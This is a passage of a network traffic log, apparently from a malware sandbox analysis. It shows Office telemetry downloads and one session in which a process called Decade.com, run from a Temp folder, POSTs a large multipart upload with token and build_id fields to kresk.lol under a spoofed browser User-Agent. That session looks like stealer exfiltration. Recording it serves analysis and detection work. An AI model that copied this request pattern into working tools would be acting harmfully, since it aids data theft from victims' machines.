AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.4	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:40 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:40 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:40 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: ddb132fa-c01e-008d-18cc-452eec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111740Z-1746fd949bdmv56chC1EWRypnn00000001ag000000002tq1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:40 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.4	49858	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:40 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:40 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:40 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 5ce939f7-901e-00ac-7ec7-45b69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111740Z-1746fd949bdlnsqphC1EWRurw0000000012g000000000zxs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:40 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.4	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:40 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:41 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:40 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111740Z-1746fd949bdjrnwqhC1EWRpg280000000140000000006sfh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:41 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49862	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:40 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ZCJ5X4E3W4EUAIEKXL6F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 35 58 34 45 33 57 34 45 55 41 49 45 4b 58 4c 36 46 0d 0a 43 6f 6e 74 Data Ascii: ------ZCJ5X4E3W4EUAIEKXL6FContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------ZCJ5X4E3W4EUAIEKXL6FContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------ZCJ5X4E3W4EUAIEKXL6FCont
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:40 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.4	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:41 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:42 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 0b7a0bcb-d01e-0082-68c5-45e489000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111742Z-1746fd949bdtlp5chC1EWRq1v400000001000000000078ka x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:42 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	49861	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:42 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:42 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:42 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111742Z-1746fd949bdtlp5chC1EWRq1v400000001300000000048pd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:42 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 